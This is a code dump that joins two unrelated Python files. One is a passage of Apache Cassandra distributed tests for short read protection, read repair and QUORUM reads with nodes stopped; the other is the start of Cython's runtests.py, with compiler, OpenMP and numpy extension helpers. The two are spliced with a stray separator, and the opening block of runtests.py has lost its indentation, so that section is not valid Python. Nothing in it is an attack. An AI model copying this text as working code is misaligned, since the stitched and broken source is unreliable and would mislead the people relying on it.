    query = "CREATE KEYSPACE test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
    session.execute(query)
    query = 'CREATE TABLE test.test (pk int, ck int, PRIMARY KEY (pk, ck));'
    session.execute(query)
    # with node2 down (diagram: live ck values per partition, "x" = tombstone,
    # "-" = absent)
    #
    # node1, partition 0 | 0 1 - -
    # node1, partition 2 | x x - -
    node2.stop(wait_other_notice=True)
    session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 0) USING TIMESTAMP 42;')
    session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 1) USING TIMESTAMP 42;')
    session.execute('DELETE FROM test.test USING TIMESTAMP 42 WHERE pk = 2 AND ck IN (0, 1);')
    node2.start(wait_other_notice=True, wait_for_binary_proto=True)
    # with node1 down
    #
    # node2, partition 0 | - - 2 3
    # node2, partition 2 | 0 1 - -
    # node2, partition 4 | 0 1 - -
    session = self.patient_cql_connection(node2)
    node1.stop(wait_other_notice=True)
    session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 2) USING TIMESTAMP 42;')
    session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 3) USING TIMESTAMP 42;')
    session.execute('INSERT INTO test.test (pk, ck) VALUES (2, 0) USING TIMESTAMP 42;')
    session.execute('INSERT INTO test.test (pk, ck) VALUES (2, 1) USING TIMESTAMP 42;')
    session.execute('INSERT INTO test.test (pk, ck) VALUES (4, 0) USING TIMESTAMP 42;')
    session.execute('INSERT INTO test.test (pk, ck) VALUES (4, 1) USING TIMESTAMP 42;')
    node1.start(wait_other_notice=True, wait_for_binary_proto=True)
    # with both nodes up, do a CL.ALL query with per partition limit of 2 and limit of 4;
    # without the extra condition in if (!singleResultCounter.isDone()) branch,
    # the query would skip partitions SRP on node2 at the end of partition 2,
    # and incorrectly return just [[0, 0], [0, 1]]
    assert_all(session,
               'SELECT pk, ck FROM test.test PER PARTITION LIMIT 2 LIMIT 4;',
               [[0, 0], [0, 1],
                [4, 0], [4, 1]],
               cl=ConsistencyLevel.ALL)
@since('3.0')
def test_13880(self):
    """
    @jira_ticket CASSANDRA-13880

    Regression test: a CL.ALL DISTINCT read of a partition deleted on only
    one replica must terminate instead of looping in short read protection.
    """
    cluster = self.cluster
    # Hinted handoff off + batch commitlog so handoff cannot mask the divergence.
    cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
    cluster.set_batch_commitlog(enabled=True)
    cluster.populate(2).start(wait_other_notice=True)
    node1, node2 = cluster.nodelist()

    session = self.patient_cql_connection(node1)
    session.execute("CREATE KEYSPACE IF NOT EXISTS test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};")
    session.execute("CREATE TABLE IF NOT EXISTS test.test (id int PRIMARY KEY);")

    insert = SimpleStatement("INSERT INTO test.test (id) VALUES (0);",
                             consistency_level=ConsistencyLevel.ALL)
    session.execute(insert)

    # With node2 down and hints disabled, delete the partition on node1 only.
    node2.stop(wait_other_notice=True)
    session.execute("DELETE FROM test.test WHERE id = 0;")
    node2.start(wait_other_notice=True)

    # With both nodes up, a CL.ALL query with per-partition limit of 1;
    # prior to CASSANDRA-13880 short read protection would loop forever here.
    assert_none(session, "SELECT DISTINCT id FROM test.test WHERE id = 0;", cl=ConsistencyLevel.ALL)
@since('3.0')
def test_13747(self):
    """
    @jira_ticket CASSANDRA-13747

    Populate 10 partitions, delete 5 of them on node1 only, then run a
    DISTINCT range query at CL.ALL; prior to CASSANDRA-13747 this tripped
    an assertion in short read protection code.
    """
    cluster = self.cluster
    # disable hinted handoff and set batch commit log so this doesn't interfere with the test
    cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
    cluster.set_batch_commitlog(enabled=True)
    cluster.populate(2).start(wait_other_notice=True)
    node1, node2 = cluster.nodelist()
    session = self.patient_cql_connection(node1)
    query = "CREATE KEYSPACE IF NOT EXISTS test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
    session.execute(query)
    query = "CREATE TABLE IF NOT EXISTS test.test (id int PRIMARY KEY);"
    session.execute(query)
    #
    # populate the table with 10 rows:
    #
    # -7509452495886106294 | 5
    # -4069959284402364209 | 1 x
    # -3799847372828181882 | 8
    # -3485513579396041028 | 0 x
    # -3248873570005575792 | 2
    # -2729420104000364805 | 4 x
    #  1634052884888577606 | 7
    #  2705480034054113608 | 6 x
    #  3728482343045213994 | 9
    #  9010454139840013625 | 3 x
    stmt = session.prepare("INSERT INTO test.test (id) VALUES (?);")
    # FIX: renamed the loop variable from `id`, which shadowed the builtin.
    for row_id in range(0, 10):
        session.execute(stmt, [row_id], ConsistencyLevel.ALL)
    # with node2 down and hints disabled, delete every other row on node1
    node2.stop(wait_other_notice=True)
    session.execute("DELETE FROM test.test WHERE id IN (1, 0, 4, 6, 3);")
    # with both nodes up, do a DISTINCT range query with CL.ALL;
    # prior to CASSANDRA-13747 this would cause an assertion in short read protection code
    node2.start(wait_other_notice=True)
    stmt = SimpleStatement("SELECT DISTINCT token(id), id FROM test.test;",
                           consistency_level=ConsistencyLevel.ALL)
    result = list(session.execute(stmt))
    assert_length_equal(result, 5)
@since('3.0')
def test_13595(self):
    """
    @jira_ticket CASSANDRA-13595

    Delete complementary halves of 10 partitions on each of two replicas,
    then verify a LIMIT 1 read at CL.ALL returns the one fully live key
    and that the expected number of short read protection requests fired.
    """
    cluster = self.cluster
    # disable hinted handoff and set batch commit log so this doesn't interfere with the test
    cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
    cluster.set_batch_commitlog(enabled=True)
    cluster.populate(2)
    node1, node2 = cluster.nodelist()
    remove_perf_disable_shared_mem(node1)  # necessary for jmx
    cluster.start(wait_other_notice=True)
    session = self.patient_cql_connection(node1)
    query = "CREATE KEYSPACE IF NOT EXISTS test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
    session.execute(query)
    query = 'CREATE TABLE IF NOT EXISTS test.test (id int PRIMARY KEY);'
    session.execute(query)
    # populate the table with 10 partitions,
    # then delete a bunch of them on different nodes
    # until we get the following pattern:
    # token                | k | 1 | 2 |
    # -7509452495886106294 | 5 | n | y |
    # -4069959284402364209 | 1 | y | n |
    # -3799847372828181882 | 8 | n | y |
    # -3485513579396041028 | 0 | y | n |
    # -3248873570005575792 | 2 | n | y |
    # -2729420104000364805 | 4 | y | n |
    #  1634052884888577606 | 7 | n | y |
    #  2705480034054113608 | 6 | y | n |
    #  3728482343045213994 | 9 | n | y |
    #  9010454139840013625 | 3 | y | y |
    stmt = session.prepare('INSERT INTO test.test (id) VALUES (?);')
    # FIX: renamed the loop variable from `id`, which shadowed the builtin.
    for row_id in range(0, 10):
        session.execute(stmt, [row_id], ConsistencyLevel.ALL)
    # delete every other partition on node1 while node2 is down
    node2.stop(wait_other_notice=True)
    session.execute('DELETE FROM test.test WHERE id IN (5, 8, 2, 7, 9);')
    node2.start(wait_other_notice=True, wait_for_binary_proto=True)
    session = self.patient_cql_connection(node2)
    # delete every other alternate partition on node2 while node1 is down
    node1.stop(wait_other_notice=True)
    session.execute('DELETE FROM test.test WHERE id IN (1, 0, 4, 6);')
    node1.start(wait_other_notice=True, wait_for_binary_proto=True)
    session = self.patient_exclusive_cql_connection(node1)
    # until #13595 the query would incorrectly return [1]
    assert_all(session,
               'SELECT id FROM test.test LIMIT 1;',
               [[3]],
               cl=ConsistencyLevel.ALL)
    srp = make_mbean('metrics', type='Table', name='ShortReadProtectionRequests', keyspace='test', scope='test')
    with JolokiaAgent(node1) as jmx:
        # 4 srp requests for node1 and 5 for node2, total of 9
        assert 9 == jmx.read_attribute(srp, 'Count')
@since('3.0')
def test_12872(self):
    """
    @jira_ticket CASSANDRA-12872

    Diverge the two replicas of a single partition via deletes and inserts
    done while one node is down, then verify a LIMIT 2 read at CL.ALL
    resolves to the two genuinely live rows (ck 0 and ck 4).
    """
    cluster = self.cluster
    # disable hinted handoff and set batch commit log so this doesn't interfere with the test
    cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
    cluster.set_batch_commitlog(enabled=True)
    cluster.populate(2).start(wait_other_notice=True)
    node1, node2 = cluster.nodelist()
    session = self.patient_cql_connection(node1)
    query = "CREATE KEYSPACE IF NOT EXISTS test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
    session.execute(query)
    query = "CREATE TABLE test.test (pk int, ck int, PRIMARY KEY (pk, ck));"
    session.execute(query)
    stmt = session.prepare("INSERT INTO test.test (pk, ck) VALUES (0, ?);")
    for ck in range(0, 4):
        session.execute(stmt, [ck], ConsistencyLevel.ALL)
    # diagram notation below: live ck values, "x" = tombstoned row
    # node1 | up   | 0 1 2 3
    # node2 | up   | 0 1 2 3
    node2.stop(wait_other_notice=True)
    # node1 | up   | 0 1 2 3
    # node2 | down | 0 1 2 3
    session.execute('DELETE FROM test.test WHERE pk = 0 AND ck IN (1, 2, 3);')
    # node1 | up   | 0 x x x
    # node2 | down | 0 1 2 3
    session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 5);')
    # node1 | up   | 0 x x x 5
    # node2 | down | 0 1 2 3
    node2.start(wait_other_notice=True)
    node1.stop(wait_other_notice=True)
    # node1 | down | 0 x x x 5
    # node2 | up   | 0 1 2 3
    session = self.patient_cql_connection(node2)
    session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 4);')
    # node1 | down | 0 x x x 5
    # node2 | up   | 0 1 2 3 4
    node1.start(wait_other_notice=True)
    # node1 | up   | 0 x x x 5
    # node2 | up   | 0 1 2 3 4
    assert_all(session,
               'SELECT ck FROM test.test WHERE pk = 0 LIMIT 2;',
               [[0], [4]],
               cl=ConsistencyLevel.ALL)
def test_short_read(self):
    """
    @jira_ticket CASSANDRA-9460

    Insert 9 columns into two rows, delete the leading (or, for the
    reversed row, trailing) 3 columns with a different node down each
    time, then verify QUORUM LIMIT 3 reads in both orders return the
    first 3 surviving columns.
    """
    cluster = self.cluster
    # This test causes the python driver to be extremely noisy due to
    # frequent starting and stopping of nodes. Let's move the log level
    # of the driver to ERROR for this test only
    logging.getLogger("cassandra").setLevel('ERROR')
    # Disable hinted handoff and set batch commit log so this doesn't
    # interfere with the test
    cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
    cluster.set_batch_commitlog(enabled=True)
    cluster.populate(3).start(wait_other_notice=True)
    node1, node2, node3 = cluster.nodelist()
    session = self.patient_cql_connection(node1)
    create_ks(session, 'ks', 3)
    # read_repair_chance was removed in 4.0, so only set it on older versions
    if cluster.version() < '4.0':
        create_cf(session, 'cf', read_repair=0.0)
    else:
        create_cf(session, 'cf')
    normal_key = 'normal'
    reversed_key = 'reversed'
    # insert 9 columns in two rows
    insert_columns(self, session, normal_key, 9)
    insert_columns(self, session, reversed_key, 9)
    # Delete 3 first columns (and 3 last columns, for the reversed version) with a different node dead each time
    for node, column_number_to_delete in zip(list(range(1, 4)), list(range(3))):
        self.stop_node(node)
        self.delete(node, normal_key, column_number_to_delete)
        self.delete(node, reversed_key, 8 - column_number_to_delete)
        self.restart_node(node)
    # Query the first 3 columns in normal order
    session = self.patient_cql_connection(node1, 'ks')
    query = SimpleStatement(
        'SELECT c, v FROM cf WHERE key=\'k{}\' LIMIT 3'.format(normal_key),
        consistency_level=ConsistencyLevel.QUORUM)
    rows = list(session.execute(query))
    res = rows
    assert_length_equal(res, 3)
    # values 0, 1 and 2 have been deleted, so values 3..5 come back first
    for i in range(1, 4):
        assert 'value{}'.format(i + 2) == res[i - 1][1]
    # Query the first 3 columns in reverse order
    session = self.patient_cql_connection(node1, 'ks')
    query = SimpleStatement(
        'SELECT c, v FROM cf WHERE key=\'k{}\' ORDER BY c DESC LIMIT 3'.format(reversed_key),
        consistency_level=ConsistencyLevel.QUORUM)
    rows = list(session.execute(query))
    res = rows
    assert_length_equal(res, 3)
    # values 6, 7 and 8 have been deleted, so values 5..3 come back first
    for i in range(0, 3):
        assert 'value{}'.format(5 - i) == res[i][1]
    session.execute('TRUNCATE cf')
def test_short_read_delete(self):
    """ Test short reads ultimately leaving no columns alive [#4000] """
    cluster = self.cluster
    # Hinted handoff off + batch commitlog so handoff cannot mask the divergence.
    cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
    cluster.set_batch_commitlog(enabled=True)
    cluster.populate(2).start(wait_other_notice=True)
    node1, node2 = cluster.nodelist()

    session = self.patient_cql_connection(node1)
    create_ks(session, 'ks', 3)
    # read_repair_chance was removed in 4.0, so only set it on older versions
    if cluster.version() < '4.0':
        create_cf(session, 'cf', read_repair=0.0)
    else:
        create_cf(session, 'cf')

    # One row with 2 columns.
    insert_columns(self, session, 0, 2)

    # Delete the whole row via node2 while node1 is down.
    node1.flush()
    node1.stop(wait_other_notice=True)
    session = self.patient_cql_connection(node2, 'ks')
    delete_stmt = SimpleStatement('DELETE FROM cf WHERE key=\'k0\'', consistency_level=ConsistencyLevel.ONE)
    session.execute(delete_stmt)
    node1.start(wait_other_notice=True)

    # A QUORUM LIMIT 1 read through node1 must resolve to no live columns.
    session = self.patient_cql_connection(node1, 'ks')
    assert_none(session, "SELECT c, v FROM cf WHERE key=\'k0\' LIMIT 1", cl=ConsistencyLevel.QUORUM)
def test_short_read_quorum_delete(self):
    """
    @jira_ticket CASSANDRA-8933

    With 3 nodes (RF=3), write two rows to all nodes, then delete each
    row at QUORUM with a different node down, so no single node has both
    tombstones; a final QUORUM LIMIT 1 read answered by the two
    partially-informed nodes must still resolve to no live rows.
    """
    cluster = self.cluster
    # Disable hinted handoff and set batch commit log so this doesn't
    # interfere with the test
    cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
    cluster.set_batch_commitlog(enabled=True)
    cluster.populate(3).start(wait_other_notice=True)
    node1, node2, node3 = cluster.nodelist()
    session = self.patient_cql_connection(node1)
    create_ks(session, 'ks', 3)
    # read_repair_chance was removed in 4.0, so only set it on older versions
    if cluster.version() < '4.0':
        session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY(id, v)) WITH read_repair_chance = 0.0")
    else:
        session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY(id, v))")
    # we write 1 and 2 in a partition: all nodes get it.
    session.execute(SimpleStatement("INSERT INTO t (id, v) VALUES (0, 1)", consistency_level=ConsistencyLevel.ALL))
    session.execute(SimpleStatement("INSERT INTO t (id, v) VALUES (0, 2)", consistency_level=ConsistencyLevel.ALL))
    # we delete 1: only A and C get it (node2 == B is down).
    node2.flush()
    node2.stop(wait_other_notice=True)
    session.execute(SimpleStatement("DELETE FROM t WHERE id = 0 AND v = 1", consistency_level=ConsistencyLevel.QUORUM))
    node2.start(wait_other_notice=True)
    # we delete 2: only B and C get it (node1 == A is down).
    node1.flush()
    node1.stop(wait_other_notice=True)
    session = self.patient_cql_connection(node2, 'ks')
    session.execute(SimpleStatement("DELETE FROM t WHERE id = 0 AND v = 2", consistency_level=ConsistencyLevel.QUORUM))
    node1.start(wait_other_notice=True)
    session = self.patient_cql_connection(node1, 'ks')
    # we read the first row in the partition (so with a LIMIT 1) and A and B answer first
    # (node3 == C, the only node with both tombstones, is taken down).
    node3.flush()
    node3.stop(wait_other_notice=True)
    assert_none(session, "SELECT * FROM t WHERE id = 0 LIMIT 1", cl=ConsistencyLevel.QUORUM)
def test_readrepair(self):
    """
    Write 10000 rows at CL.ONE while node2 is down, read them all back at
    CL.QUORUM to trigger read repair, then verify node2 alone can serve
    every key at CL.ONE.
    """
    cluster = self.cluster
    # hints would repair node2 on restart by themselves; disable them so
    # only read repair can do it
    cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
    if not self.dtest_config.use_vnodes:
        cluster.populate(2).start()
    else:
        tokens = cluster.balanced_tokens(2)
        cluster.populate(2, tokens=tokens).start()
    node1, node2 = cluster.nodelist()
    session = self.patient_cql_connection(node1)
    create_ks(session, 'ks', 2)
    # read_repair_chance was removed in 4.0, so only set it on older versions
    if cluster.version() < '4.0':
        create_c1c2_table(self, session, read_repair=1.0)
    else:
        create_c1c2_table(self, session)
    node2.stop(wait_other_notice=True)
    insert_c1c2(session, n=10000, consistency=ConsistencyLevel.ONE)
    node2.start(wait_for_binary_proto=True, wait_other_notice=True)
    # query everything to cause RR
    for n in range(0, 10000):
        query_c1c2(session, n, ConsistencyLevel.QUORUM)
    node1.stop(wait_other_notice=True)
    # Check node2 for all the keys that should have been repaired
    session = self.patient_cql_connection(node2, keyspace='ks')
    for n in range(0, 10000):
        query_c1c2(session, n, ConsistencyLevel.ONE)
def test_quorum_available_during_failure(self):
    """QUORUM reads must keep succeeding with one of three replicas down."""
    consistency = ConsistencyLevel.QUORUM
    replication_factor = 3

    logger.debug("Creating a ring")
    cluster = self.cluster
    if self.dtest_config.use_vnodes:
        cluster.populate(3, tokens=cluster.balanced_tokens(3)).start()
    else:
        cluster.populate(3).start()
    node1, node2, node3 = cluster.nodelist()

    logger.debug("Set to talk to node 2")
    session = self.patient_cql_connection(node2)
    create_ks(session, 'ks', replication_factor)
    create_c1c2_table(self, session)

    logger.debug("Generating some data")
    insert_c1c2(session, n=100, consistency=consistency)

    logger.debug("Taking down node1")
    node1.stop(wait_other_notice=True)

    logger.debug("Reading back data.")
    for key in range(100):
        query_c1c2(session, key, consistency)
def stop_node(self, node_number):
    """Flush and stop cluster node ``node<node_number>``, waiting for the ring to notice."""
    node = self.cluster.nodes["node%d" % node_number]
    node.flush()
    node.stop(wait_other_notice=True)
def delete(self, stopped_node_number, key, column):
    """
    While node ``stopped_node_number`` is down, connect to the next node in
    the 3-node ring and batch-delete column ``column`` plus column 'c2' of
    row ``k<key>`` at QUORUM.
    """
    next_node = self.cluster.nodes["node%d" % (((stopped_node_number + 1) % 3) + 1)]
    session = self.patient_cql_connection(next_node, 'ks')
    # Assemble the batch in pieces; the resulting CQL text is unchanged.
    parts = [
        'BEGIN BATCH ',
        'DELETE FROM cf WHERE key=\'k%s\' AND c=\'c%06d\'; ' % (key, column),
        'DELETE FROM cf WHERE key=\'k%s\' AND c=\'c2\'; ' % (key,),
        'APPLY BATCH;',
    ]
    batch_cql = ''.join(parts)
    session.execute(SimpleStatement(batch_cql, consistency_level=ConsistencyLevel.QUORUM))
def restart_node(self, node_number):
    """Bring cluster node ``node<node_number>`` back up and wait until it is fully joined."""
    node = self.cluster.nodes["node%d" % node_number]
    node.start(wait_for_binary_proto=True, wait_other_notice=True)
|
runtests.py | #!/usr/bin/env python
from __future__ import print_function
import atexit
import os
import sys
import re
import gc
import heapq
import locale
import shutil
import time
import unittest
import doctest
import operator
import subprocess
import tempfile
import traceback
import warnings
import zlib
import glob
from contextlib import contextmanager
try:
import platform
IS_PYPY = platform.python_implementation() == 'PyPy'
IS_CPYTHON = platform.python_implementation() == 'CPython'
except (ImportError, AttributeError):
IS_CPYTHON = True
IS_PYPY = False
IS_PY2 = sys.version_info[0] < 3
from io import open as io_open
try:
from StringIO import StringIO
except ImportError:
from io import StringIO # doesn't accept 'str' in Py2
try:
import cPickle as pickle
except ImportError:
import pickle
try:
import threading
except ImportError: # No threads, no problems
threading = None
try:
from collections import defaultdict
except ImportError:
class defaultdict(object):
def __init__(self, default_factory=lambda : None):
self._dict = {}
self.default_factory = default_factory
def __getitem__(self, key):
if key not in self._dict:
self._dict[key] = self.default_factory()
return self._dict[key]
def __setitem__(self, key, value):
self._dict[key] = value
def __contains__(self, key):
return key in self._dict
def __repr__(self):
return repr(self._dict)
def __nonzero__(self):
return bool(self._dict)
try:
from unittest import SkipTest
except ImportError:
class SkipTest(Exception): # don't raise, only provided to allow except-ing it!
pass
def skip_test(reason):
sys.stderr.write("Skipping test: %s\n" % reason)
else:
def skip_test(reason):
raise SkipTest(reason)
try:
basestring
except NameError:
basestring = str
WITH_CYTHON = True
CY3_DIR = None
from distutils.command.build_ext import build_ext as _build_ext
from distutils import sysconfig
from distutils import ccompiler
_to_clean = []
@atexit.register
def _cleanup_files():
    """
    Remove every path queued in ``_to_clean`` at interpreter exit.

    This is only used on Cygwin to clean up shared libraries that are unsafe
    to delete while the test suite is running.
    """
    for path in _to_clean:
        if os.path.isdir(path):
            shutil.rmtree(path, ignore_errors=True)
            continue
        try:
            os.remove(path)
        except OSError:
            pass
def get_distutils_distro(_cache=[]):
    """Return a cached distutils ``Distribution`` configured from the usual
    config files, with ``setup.cfg`` removed on Windows.

    ``_cache`` is a deliberate mutable default used as a one-slot memo.
    """
    if _cache:
        return _cache[0]
    # late import to accommodate for setuptools override
    from distutils.dist import Distribution
    distutils_distro = Distribution()
    if sys.platform == 'win32':
        # TODO: Figure out why this hackery (see https://thread.gmane.org/gmane.comp.python.cython.devel/8280/).
        config_files = distutils_distro.find_config_files()
        try:
            config_files.remove('setup.cfg')
        except ValueError:
            pass
        distutils_distro.parse_config_files(config_files)
        # NOTE(review): the block below repeats the exact find/remove/parse
        # sequence a second time — presumably part of the hackery referenced
        # above; verify before deduplicating.
        cfgfiles = distutils_distro.find_config_files()
        try:
            cfgfiles.remove('setup.cfg')
        except ValueError:
            pass
        distutils_distro.parse_config_files(cfgfiles)
    _cache.append(distutils_distro)
    return distutils_distro
# Maps a test tag (or test-name substring) to a module that must be importable
# for the tagged tests to be runnable; tests are skipped when the import fails.
EXT_DEP_MODULES = {
    'tag:numpy': 'numpy',
    'tag:numpy_old': 'numpy',
    'tag:pythran': 'pythran',
    'tag:setuptools': 'setuptools.sandbox',
    'tag:asyncio': 'asyncio',
    'tag:pstats': 'pstats',
    'tag:posix': 'posix',
    'tag:array': 'array',
    'tag:coverage': 'Cython.Coverage',
    'Coverage': 'Cython.Coverage',
    'tag:ipython': 'IPython.testing.globalipapp',
    'tag:jedi': 'jedi_BROKEN_AND_DISABLED',
    'tag:test.support': 'test.support',  # support module for CPython unit tests
}
def patch_inspect_isfunction():
    """Monkey-patch ``inspect.isfunction`` so it also accepts Cython's
    ``cython_function_or_method`` objects.

    The original function is stashed on the replacement as
    ``_orig_isfunction`` so ``unpatch_inspect_isfunction`` can restore it.
    """
    import inspect
    original = inspect.isfunction

    def isfunction(obj):
        return original(obj) or type(obj).__name__ == 'cython_function_or_method'

    isfunction._orig_isfunction = original
    inspect.isfunction = isfunction
def unpatch_inspect_isfunction():
    """Restore the original ``inspect.isfunction`` if it was patched by
    ``patch_inspect_isfunction``; silently do nothing otherwise."""
    import inspect
    original = getattr(inspect.isfunction, '_orig_isfunction', None)
    if original is not None:
        inspect.isfunction = original
def def_to_cdef(source):
    '''
    Converts the module-level def methods into cdef methods, i.e.
    @decorator
    def foo([args]):
        """
        [tests]
        """
        [body]
    becomes
    def foo([args]):
        """
        [tests]
        """
        return foo_c([args])
    cdef foo_c([args]):
        [body]
    '''
    output = []
    skip = False
    def_node = re.compile(r'def (\w+)\(([^()*]*)\):').match
    # A single shared iterator: the docstring scan below advances the same
    # stream the outer loop consumes.
    lines = iter(source.split('\n'))
    for line in lines:
        if not line.strip():
            output.append(line)
            continue
        if skip:
            # Inside a decorated function: skip lines until dedent back to column 0.
            if line[0] != ' ':
                skip = False
            else:
                continue
        if line[0] == '@':
            skip = True
            continue
        m = def_node(line)
        if m:
            name = m.group(1)
            args = m.group(2)
            if args:
                # Drop type declarations, keeping only the argument names.
                args_no_types = ", ".join(arg.split()[-1] for arg in args.split(','))
            else:
                args_no_types = ""
            output.append("def %s(%s):" % (name, args_no_types))
            line = next(lines)
            if '"""' in line:
                # Keep the docstring (and its doctests) on the def wrapper.
                has_docstring = True
                output.append(line)
                for line in lines:
                    output.append(line)
                    if '"""' in line:
                        break
            else:
                has_docstring = False
            output.append("    return %s_c(%s)" % (name, args_no_types))
            output.append('')
            output.append("cdef %s_c(%s):" % (name, args))
            # The first body line was already consumed above; re-emit it
            # unless it belonged to the docstring.
            if not has_docstring:
                output.append(line)
        else:
            output.append(line)
    return '\n'.join(output)
def exclude_extension_in_pyver(*versions):
    """Return an EXT_EXTRAS fixer that excludes the extension when the running
    Python's (major, minor) is one of *versions*, and keeps it otherwise."""
    def check(ext):
        if sys.version_info[:2] in versions:
            return EXCLUDE_EXT
        return ext
    return check
def exclude_extension_on_platform(*platforms):
    """Return an EXT_EXTRAS fixer that excludes the extension on the listed
    ``sys.platform`` values and keeps it elsewhere."""
    def check(ext):
        if sys.platform in platforms:
            return EXCLUDE_EXT
        return ext
    return check
def update_linetrace_extension(ext):
    """Enable Cython line tracing (CYTHON_TRACE) on *ext* and return it."""
    ext.define_macros.append(('CYTHON_TRACE', 1))
    return ext
def update_old_numpy_extension(ext):
    """Configure *ext* for numpy without defining the NumPy 1.7 C-API macro."""
    update_numpy_extension(ext, set_api17_macro=False)
def update_numpy_extension(ext, set_api17_macro=True):
    """Add numpy include dirs, the deprecation-guard macro and npymath
    build info to *ext*.

    NOTE(review): ``numpy.distutils`` is deprecated/removed in recent numpy
    releases — verify against the numpy versions this runner supports.
    """
    import numpy
    from numpy.distutils.misc_util import get_info
    ext.include_dirs.append(numpy.get_include())
    if set_api17_macro:
        ext.define_macros.append(('NPY_NO_DEPRECATED_API', 'NPY_1_7_API_VERSION'))
    # We need the npymath library for numpy.math.
    # This is typically a static-only library.
    # get_info('npymath') yields dict keys that map 1:1 onto Extension
    # list attributes (libraries, library_dirs, include_dirs, ...).
    for attr, value in get_info('npymath').items():
        getattr(ext, attr).extend(value)
def update_openmp_extension(ext):
    """Attach OpenMP compile/link flags to *ext*.

    Returns the updated extension, or ``EXCLUDE_EXT`` when no usable OpenMP
    flags are known for the current compiler/platform.
    """
    ext.openmp = True
    language = ext.language
    if sys.platform == 'win32' and sys.version_info[:2] == (3, 4):
        # OpenMP tests fail in appveyor in Py3.4 -> just ignore them, EoL of Py3.4 is early 2019...
        return EXCLUDE_EXT
    # Flags were probed once at module init (get_openmp_compiler_flags).
    if language == 'cpp':
        flags = OPENMP_CPP_COMPILER_FLAGS
    else:
        flags = OPENMP_C_COMPILER_FLAGS
    if flags:
        compile_flags, link_flags = flags
        ext.extra_compile_args.extend(compile_flags.split())
        ext.extra_link_args.extend(link_flags.split())
        return ext
    elif sys.platform == 'win32':
        # No probed flags, but keep the extension on Windows anyway.
        return ext
    return EXCLUDE_EXT
def update_cpp11_extension(ext):
    """
    update cpp11 extensions that will run on versions of gcc >4.8
    """
    gcc_version = get_gcc_version(ext.language)
    if gcc_version:
        compiler_version = gcc_version.group(1)
        # NOTE(review): float("4.10") == 4.1, so this comparison misorders
        # two-digit minor versions — verify against the gcc releases in use.
        if float(compiler_version) > 4.8:
            ext.extra_compile_args.append("-std=c++11")
        return ext
    clang_version = get_clang_version(ext.language)
    if clang_version:
        ext.extra_compile_args.append("-std=c++11")
        if sys.platform == "darwin":
            # macOS clang needs libc++ and a deployment target new enough for C++11.
            ext.extra_compile_args.append("-stdlib=libc++")
            ext.extra_compile_args.append("-mmacosx-version-min=10.7")
        return ext
    # Neither gcc nor clang detected -> C++11 support cannot be assumed.
    return EXCLUDE_EXT
def get_cc_version(language):
    """
    Return the version banner of the configured C/C++ compiler (stderr of
    ``<cc> -v``), or '' when no compiler can be found or run.
    """
    if language == 'cpp':
        cc = sysconfig.get_config_var('CXX')
    else:
        cc = sysconfig.get_config_var('CC')
    if not cc:
        cc = ccompiler.get_default_compiler()
    if not cc:
        return ''
    # For some reason, cc can be e.g. 'gcc -pthread'
    cc = cc.split()[0]
    # Force english output
    env = os.environ.copy()
    env['LC_MESSAGES'] = 'C'
    try:
        p = subprocess.Popen([cc, "-v"], stderr=subprocess.PIPE, env=env)
    except EnvironmentError:
        # Be compatible with Python 3
        warnings.warn("Unable to find the %s compiler: %s: %s" %
                      (language, os.strerror(sys.exc_info()[1].errno), cc))
        return ''
    _, output = p.communicate()
    # Decode with the user's preferred encoding; never fail on odd bytes.
    return output.decode(locale.getpreferredencoding() or 'ASCII', 'replace')
def get_gcc_version(language):
    """Return a regex match whose group 1 is the gcc version ("X.Y"),
    or None when the configured compiler is not gcc."""
    banner = get_cc_version(language)
    return re.search(r"gcc version (\d+\.\d+)", banner)
def get_clang_version(language):
    """Return a regex match whose group 1 is the clang version ("X.Y"),
    or None when the configured compiler is not clang."""
    banner = get_cc_version(language)
    return re.search(r"clang(?:-|\s+version\s+)(\d+\.\d+)", banner)
def get_openmp_compiler_flags(language):
    """
    As of gcc 4.2, it supports OpenMP 2.5. Gcc 4.4 implements 3.0. We don't
    (currently) check for other compilers.
    returns a two-tuple of (CFLAGS, LDFLAGS) to build the OpenMP extension
    """
    gcc_version = get_gcc_version(language)
    if not gcc_version:
        if sys.platform == 'win32':
            return '/openmp', ''
        else:
            return None  # not gcc - FIXME: do something about other compilers
    # gcc defines "__int128_t", assume that at least all 64 bit architectures have it
    global COMPILER_HAS_INT128
    COMPILER_HAS_INT128 = getattr(sys, 'maxsize', getattr(sys, 'maxint', 0)) > 2**60
    compiler_version = gcc_version.group(1)
    # NOTE(review): this compares version components as strings
    # (['4', '10'] < ['4', '2'] lexicographically), and implicitly returns
    # None for gcc older than 4.2 — verify both behaviours are intended.
    if compiler_version and compiler_version.split('.') >= ['4', '2']:
        return '-fopenmp', '-fopenmp'
# Initialise the user's default locale; ignore locales the OS cannot provide.
try:
    locale.setlocale(locale.LC_ALL, '')
except locale.Error:
    pass
# Explicit compiler override (filled in from command-line options elsewhere).
COMPILER = None
# Set as a side effect of get_openmp_compiler_flags() below.
COMPILER_HAS_INT128 = False
OPENMP_C_COMPILER_FLAGS = get_openmp_compiler_flags('c')
OPENMP_CPP_COMPILER_FLAGS = get_openmp_compiler_flags('cpp')
# Return this from the EXT_EXTRAS matcher callback to exclude the extension
EXCLUDE_EXT = object()
# Maps a tag selector to a fixer callback applied to matching extensions;
# a fixer returns the (possibly modified) extension or EXCLUDE_EXT.
EXT_EXTRAS = {
    'tag:numpy' : update_numpy_extension,
    'tag:numpy_old' : update_old_numpy_extension,
    'tag:openmp': update_openmp_extension,
